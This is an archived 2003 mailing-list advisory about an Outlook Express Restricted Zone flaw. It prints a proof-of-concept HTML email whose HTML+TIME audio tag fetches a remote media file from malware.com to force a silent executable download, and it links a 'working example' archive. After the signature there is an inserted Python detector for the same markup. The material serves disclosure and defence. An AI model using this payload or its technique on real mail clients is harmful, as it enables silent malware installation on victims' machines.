Restricted Zone: the OUTLOOK EXPRESS

From: http-equivat_private
Date: Wed May 21 2003 - 04:55:34 PDT

Tuesday, 20 May, 2003

Silent delivery and installation of an executable on a target 
computer. No client input other than opening an email or newsgroup 
post.

This can be achieved with the default setting of Outlook Express: 
RESTRICTED ZONE.

Technically the following never worked, cannot work, shouldn't work. 
But it does:

MIME-Version: 1.0
Content-Type: text/html;
Content-Transfer-Encoding: 7bit
X-Source: 05.19.03  http://www.malware.com 

<html xmlns:t>
<head><style>
t\:*{behavior:url(#default#time);display:none}</style></head><body>
<t:audio  t:src="http://www.malware.com/freek.asf"  />
</body></html>

What that does is invoke our freakish media file including our trusty 
and battle-hardened 0s URL flip from within the html of an email or 
newsgroup post on viewing, which ordinarily could never be done.

But it now appears that while custom-crafted media files fail, 
modified third-party files [whatever that means] function according 
to plan. Specifically audio + *.asf. Our 0s URL flip points to our 
file on the remote server and automatically forces our download as 
instructed. Couple that with the most recent flood-like functionality 
of the iframe: http://www.securityfocus.com/archive/1/321662 and 
that's the end of that.

Tested on:

Outlook Express 6.00.2800.1123 and all of its 'patches'
with WMP 7.01.00.3055 and 8.00.00.4487 [WMP 9 fails]

First Step Working Example:

http://www.malware.com/but.its.free.zip

Notes:

1. this is reminiscent of GreyMagic Software's 'Qualcomm Eudora 
WebBrowser Control Embedded Media Player File Vulnerability': 
http://www.securityfocus.com/bid/4343 which appears to never have 
been patched.

2. disable scripting in the media player [if it helps]

3. do not be lured into opening email and newsgroup posts from 
untrustworthy sources

End Call

-- 
http://www.malware.com
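A defender-side check for the HTML+TIME construct the post relies on, added here as an example and not part of the original message or of malware.com's files: it parses a raw message and flags text/html parts that declare a TIME namespace on the html element, bind the default#time behavior, and point a t:src attribute at a remote media file. The sample message below is constructed for the example (placeholder host, not the advisory's URL).

```python
import email
import re
from email import policy

# Constructed sample message modelled on the advisory's PoC layout (not a real capture).
SAMPLE_MESSAGE = """\
From: sender@example.invalid
To: victim@example.invalid
Subject: test
MIME-Version: 1.0
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit

<html xmlns:t>
<head><style>
t\\:*{behavior:url(#default#time);display:none}</style></head><body>
<t:audio  t:src="http://media.example.invalid/clip.asf"  />
</body></html>
"""

# Indicators of HTML+TIME (Internet Explorer timed-media) markup inside a message body.
# Each entry is (indicator name, compiled regex). Where a regex has a capture group,
# the captured text (element kind or URL) is what gets reported.
HTML_TIME_INDICATORS = [
    ("time-namespace", re.compile(r"<html[^>]*\bxmlns:\w+\b", re.I)),
    ("time-behavior", re.compile(r"behavior\s*:\s*url\(\s*#default#time2?\s*\)", re.I)),
    ("time-media-element", re.compile(r"<\w+:(audio|video|media|animation)\b", re.I)),
    ("remote-media-src", re.compile(r"\b\w+:src\s*=\s*[\"']?(https?://[^\"'\s>]+)", re.I)),
]


def find_html_time_indicators(raw_message: str) -> dict:
    """Parse a raw RFC 822 message and return {indicator: evidence} for every
    text/html part. Non-HTML parts are ignored; the first match per indicator wins."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    hits = {}
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        body = part.get_content()
        for name, pattern in HTML_TIME_INDICATORS:
            m = pattern.search(body)
            if m and name not in hits:
                hits[name] = m.group(m.lastindex or 0)
    return hits


def is_suspicious(raw_message: str) -> bool:
    """True when a TIME media element is present and fetches a remote source,
    which is exactly the combination the advisory uses to trigger the player."""
    hits = find_html_time_indicators(raw_message)
    return "time-media-element" in hits and "remote-media-src" in hits
```

Running is_suspicious over the sample returns True; a plain HTML message with no TIME markup returns False.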



    This archive was generated by hypermail 2b30 : Wed May 21 2003 - 09:53:15 PDT